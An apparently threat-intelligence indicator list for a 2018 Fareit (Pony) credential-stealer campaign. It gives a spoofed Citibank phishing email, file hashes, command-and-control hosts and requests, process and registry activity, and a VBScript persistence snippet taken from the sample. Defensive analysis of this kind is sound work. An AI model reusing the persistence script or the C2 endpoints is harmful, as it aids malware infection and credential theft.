#Fareit_181018

1. #IOC #OptiData #VR #Pony #Fareit #ACE
2.  
3. https://pastebin.com/u0D14L5r
4. FAQ:
5. https://radetskiy.wordpress.com/?s=fareit
6.  
7. attack_vector
8. --------------
9. email attach (ace) > exe > %temp%\subfolder\filename.exe
10.  
11. email_headers
12. --------------
13. Received: from plesk2.qsoftweb.com (plesk2.qsoftweb.com [78.46.145.250])
14. by mailsrv2.victim1.com (8.15.2/8.15.2) with SMTP id w9I9rvLr042922
15. for <user01@org3.victim1.com>; Thu, 18 Oct 2018 12:54:08 +0300 (EEST)
16. (envelope-from spoof@citicorp.com)
17. Received: from webmail.edwise.pk (localhost [IPv6:::1])
18. by plesk2.qsoftweb.com (Postfix) with ESMTPSA id 7CE3E20B62;
19. Thu, 18 Oct 2018 05:44:02 -0400 (EDT)
20. Date: Thu, 18 Oct 2018 10:44:02 +0100
21. From: CITIBANK <spoof@citicorp.com>
22. To: undisclosed-recipients:;
23. Subject: Payment Slip - Payment remitted 15/10/2018
24. X-Sender: spoof@citicorp.com
25. User-Agent: Roundcube Webmail/1.3.6
26.  
27. email_subjects
28. --------------
29. Payment Slip - Payment remitted 15/10/2018
30.  
31. files
32. --------------
33. SHA-256 ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3
34. File name Payment slip.ace
35. File size 264.85 KB
36.  
37. SHA-256 3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783
38. File name Kakih > %temp%\subfolder\filename.exe
39. File size 618.27 KB
40.  
41. activity
42. **************
43.  
44. netwrk
45. --------------
46. 194.36.173.171 armansaykham.com POST /nonso/gate.php HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
47. 67.227.226.240 pornhouse.mobi GET /main.php?dir=//Virgin%20Babes%20First%20Sex&start=1&sort=1 HTTP/1.0 Mozilla/4.0 (compatible; MSIE 5.0; Windows 98)
48.  
49. comp
50. --------------
51. [System Process] 0 TCP 194.36.173.171 80 TIME_WAIT
52. filename.exe 2160 TCP 67.227.226.240 80 ESTABLISHED
53.  
54. proc
55. --------------
56. "C:\Users\operator\Desktop\Payment slip.exe"
57. "C:\Windows\System32\WScript.exe" "C:\tmp\subfolder\filename.vbs"
58. "C:\tmp\subfolder\filename.exe"
59. "C:\tmp\subfolder\filename.exe"
60. C:\Windows\SysWOW64\cmd.exe /c ""C:\tmp\7710921.bat" "C:\tmp\subfolder\filename.exe" "
61.  
62. vbs
63. --------------
64. filenameOn Error Resume Next
65. Set WshShell = CreateObject("WScript.Shell")
66. myKey = "HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Registry Key Name"
67. Vbs ="C:\tmp\subfolder\filename.vbs"
68. If WScript.Arguments.Count = 0 Then
69. GG = second(now)
70. WScript.Sleep 5000
71. VV = second(now)
72. Vbs = Vbs & " -FF"
73. If Abs(VV-GG) => 5 then WshShell.RegWrite myKey,Vbs,"REG_SZ"
74. WScript.Quit
75. end if
76. WshShell.Run """C:\tmp\subfolder\filename.exe"""
77.  
78. persist
79. --------------
80. HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 18.10.2018 17:32
81. Registry Key Name c:\tmp\subfolder\filename.vbs 18.10.2018 17:32
82.  
83. drop
84. --------------
85. C:\tmp\subfolder\filename.exe
86. C:\tmp\subfolder\filename.vbs
87.  
88. # # #
89. https://www.virustotal.com/#/file/ad73105314b633bff23b5f9065d1f2ed3248ea6ad1a69c2893021c9618ce6fa3/details
90. https://www.virustotal.com/#/file/3c616a7c56f6e2bdf4d878e2ada4662f7b70215aa474135c5d463af0e78c6783/details
91. https://analyze.intezer.com/#/analyses/52017eed-c2d4-4da9-be09-a1a57f09cfa5
92.  
93. Harvests credentials from local FTP client softwares
94. Harvests information related to installed mail clients